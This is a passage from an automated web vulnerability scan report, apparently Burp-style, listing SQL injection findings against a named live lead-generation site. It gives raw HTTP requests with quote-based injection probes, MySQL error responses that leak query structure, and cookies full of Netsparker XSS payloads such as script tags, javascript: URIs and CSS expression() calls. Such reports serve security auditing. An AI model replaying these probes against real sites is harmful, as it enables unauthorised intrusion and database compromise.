sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:31:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2nsricmtludcfkpsts5nhqfur1; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/hins00/project_dynamic_page_updated.php?catId=50002'&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002'&group=hins00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dyna' at line 5

Request 2

GET /ppc/leadflow/hins00/project_dynamic_page_updated.php?catId=50002''&group=hins00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:31:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q2mdv682ldkquk7nrf9pm10lf2; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/hins00/project_dynamic_page_updated.php was not found on this server.</p>

1.391. http://www.insideup.com/ppc/leadflow/hins00/project_dynamic_page_updated.php [group parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project_dynamic_page_updated.php

Issue detail

The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

POST /ppc/leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00'&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 598

subcategoryId=50002&catId=50002&iusrc=iupsc+&attributeId_556_t=&attributeId_555_t=&attributeId_514_t=&attributeId_421=2740__Yes&attributeId_515=3355__Not+sure&attributeId_422[]=2747__Other+or+not+sure
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:29:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=o5r8pf8cnl6ns41s75ojv3bvf5; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00'&template=3' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project_dynamic_page_updated.php?ca' at line 5

Request 2

POST /ppc/leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00''&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 598

subcategoryId=50002&catId=50002&iusrc=iupsc+&attributeId_556_t=&attributeId_555_t=&attributeId_514_t=&attributeId_421=2740__Yes&attributeId_515=3355__Not+sure&attributeId_422[]=2747__Other+or+not+sure
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:29:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=h498sco7g0v6kqv1lj5hlgc3g6; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.392. http://www.insideup.com/ppc/leadflow/hins00/project_dynamic_page_updated.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project_dynamic_page_updated.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 